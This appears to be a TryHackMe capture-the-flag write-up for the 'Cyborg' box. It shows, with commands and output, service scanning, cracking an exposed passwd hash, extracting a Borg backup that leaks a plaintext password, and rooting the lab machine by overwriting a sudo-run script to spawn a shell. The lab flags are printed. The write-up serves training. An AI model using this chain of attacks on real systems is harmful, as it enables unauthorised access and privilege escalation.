TryHackMe-Cyborg
Cyborg
A box involving encrypted archives, source code analysis and more.
Compromise the machine and read the user.txt and root.txt
Scan the machine, how many ports are open?
Let’s start by scanning the machine with Nmap to identify the running services. There are 2 services exposed:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA) | 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA) |_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Answer: 2
What service is running on port 22?
Answer: SSH
What service is running on port 80?
Answer: HTTP
What is the user.txt flag?
Web enumeration
Gobuster reveals 2 interesting hidden locations:
kali@kali:/data/Cyborg$ gobuster dir -u http://10.10.61.219 -x php,txt,old,bak,zip,tar -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.61.219 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt,old,bak,zip,tar [+] Timeout: 10s =============================================================== 2021/04/29 11:21:34 Starting gobuster =============================================================== /.hta (Status: 403) /.hta.zip (Status: 403) /.hta.tar (Status: 403) /.hta.php (Status: 403) /.hta.txt (Status: 403) /.hta.old (Status: 403) /.hta.bak (Status: 403) /.htaccess (Status: 403) /.htaccess.old (Status: 403) /.htaccess.bak (Status: 403) /.htaccess.zip (Status: 403) /.htaccess.tar (Status: 403) /.htaccess.php (Status: 403) /.htaccess.txt (Status: 403) /.htpasswd (Status: 403) /.htpasswd.old (Status: 403) /.htpasswd.bak (Status: 403) /.htpasswd.zip (Status: 403) /.htpasswd.tar (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.txt (Status: 403) /admin (Status: 301) <------------------ interesting /etc (Status: 301) <-------------------- interesting /index.html (Status: 200) /server-status (Status: 403) =============================================================== 2021/04/29 11:25:42 Finished ===============================================================
The etc
directory
The /etc
directory contains a squid
subdirectory, with an interesting passwd
file:
kali@kali:/data/Cyborg/files$ curl -s http://10.10.61.219/etc/squid/ | html2text ****** Index of /etc/squid ****** [[ICO]] Name Last_modified Size Description =========================================================================== [[PARENTDIR]] Parent_Directory - [[ ]] passwd 2020-12-30 02:09 52 [[ ]] squid.conf 2020-12-30 02:09 258 =========================================================================== Apache/2.4.18 (Ubuntu) Server at 10.10.61.219 Port 80
The passwd
file contains encrypted credentials for the music_archive
user:
kali@kali:/data/Cyborg/files$ curl -s http://10.10.61.219/etc/squid/passwd music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Let’s crack the hash:
kali@kali:/data/Cyborg/files$ /data/src/john/run/john passwd.hash --wordlist=/usr/share/wordlists/rockyou.txt Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status squidward (?) 1g 0:00:00:00 DONE (2021-04-29 11:43) 3.846g/s 149907p/s 149907c/s 149907C/s 112806..samantha5 Use the "--show" option to display all of the cracked passwords reliably Session completed.
We have found credentials: music_archive:squidward
.
The admin
directory
The other hidden location (/admin
) is a website about music. Playing with the menus, you will find an entry to download an archive. uncompressing it leads to weird/encrypted files:
kali@kali:/data/Cyborg/files$ wget http://10.10.61.219/admin/archive.tar kali@kali:/data/Cyborg/files$ tar xf archive.tar kali@kali:/data/Cyborg/files$ tree home/ home/ └── field └── dev └── final_archive ├── config ├── data │ └── 0 │ ├── 1 │ ├── 3 │ ├── 4 │ └── 5 ├── hints.5 ├── index.5 ├── integrity.5 ├── nonce └── README 5 directories, 10 files
The README
file is the key as it explains what this archive is all about. It is a BorgBackup archive.
kali@kali:/data/Cyborg/files/home/field/dev/final_archive$ cat README This is a Borg Backup repository. See https://borgbackup.readthedocs.io/
The BorgBackup archive
To know more about BorgBackup and available commands, use the official documentation.
List all archives in the repository:
kali@kali:/data/Cyborg/files/home/field/dev$ borg list final_archive Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: music_archive Tue, 2020-12-29 15:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
List the contents of the music_archive
archive:
kali@kali:/data/Cyborg/files/home/field/dev$ borg list final_archive::music_archive Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: drwxr-xr-x alex alex 0 Tue, 2020-12-29 14:55:52 home/alex -rw-r--r-- alex alex 3637 Mon, 2020-12-28 15:25:14 home/alex/.bashrc -rw-r--r-- alex alex 220 Mon, 2020-12-28 15:25:14 home/alex/.bash_logout -rw-r--r-- alex alex 675 Mon, 2020-12-28 15:25:14 home/alex/.profile drwxrwxr-x alex alex 0 Mon, 2020-12-28 19:00:24 home/alex/Music -rw------- alex alex 439 Mon, 2020-12-28 18:26:45 home/alex/.bash_history [REDACTED] drwx------ root root 0 Mon, 2020-12-28 17:33:49 home/alex/.config/sublime-text-3/Installed Packages drwx------ root root 0 Mon, 2020-12-28 17:33:49 home/alex/.config/ibus drwx------ root root 0 Mon, 2020-12-28 17:33:49 home/alex/.config/ibus/bus drwxrwxr-x alex alex 0 Tue, 2020-12-29 14:55:52 home/alex/Documents -rw-r--r-- root root 110 Tue, 2020-12-29 14:55:41 home/alex/Documents/note.txt drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:59:30 home/alex/Public drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:59:37 home/alex/Videos drwxrwxr-x alex alex 0 Tue, 2020-12-29 14:57:14 home/alex/Desktop -rw-r--r-- root root 71 Tue, 2020-12-29 14:57:14 home/alex/Desktop/secret.txt drwxrwxr-x alex alex 0 Mon, 2020-12-28 18:59:57 home/alex/Downloads drwxrwxr-x alex alex 0 Mon, 2020-12-28 19:00:02 home/alex/Templates drwxrwxr-x alex alex 0 Mon, 2020-12-28 19:26:44 home/alex/Pictures
Restore the music_archive
archive by extracting the files relative to the current directory:
kali@kali:/data/Cyborg/files/home/field/dev$ borg extract final_archive::music_archive Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: kali@kali:/data/Cyborg/files/home/field/dev$ tree home/ home/ └── alex ├── Desktop │ └── secret.txt ├── Documents │ └── note.txt ├── Downloads ├── Music ├── Pictures ├── Public ├── Templates └── Videos 9 directories, 2 files
Connect as alex and get the user flag
There are obviously 2 interesting documents in the recovered archive, 1 of them revealing alex
’s credentials:
kali@kali:/data/Cyborg/files/home/field/dev$ cat home/alex/Desktop/secret.txt shoutout to all the people who have gotten to this stage whoop whoop!" kali@kali:/data/Cyborg/files/home/field/dev$ cat home/alex/Documents/note.txt Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down! alex:S3cretP@s3
Now connect with SSH and get the flag:
kali@kali:/data/Cyborg/files$ ssh [email protected] alex@ubuntu:~$ cat user.txt flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
What is the root.txt flag?
Checking alex
’s privileges reveals that we can run a backup.sh
script as root
with sudo
without password:
alex@ubuntu:~$ sudo -l Matching Defaults entries for alex on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alex may run the following commands on ubuntu: (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
we are owner of the script but it lacks from modification privileges:
alex@ubuntu:~$ ls -l /etc/mp3backups/backup.sh -r-xr-xr-- 1 alex alex 1083 Dec 30 01:48 /etc/mp3backups/backup.sh
Let’s make the script editable and replace the content of the script to spawn a shell. As the script will be run with root privileges, we will have a root access.
alex@ubuntu:/etc/mp3backups$ chmod +w backup.sh alex@ubuntu:/etc/mp3backups$ cat > backup.sh << EOF > #!/bin/bash > /bin/bash > EOF alex@ubuntu:/etc/mp3backups$ sudo /etc/mp3backups/backup.sh root@ubuntu:/etc/mp3backups# cd /root root@ubuntu:/root# cat root.txt flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}
Root flag: flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}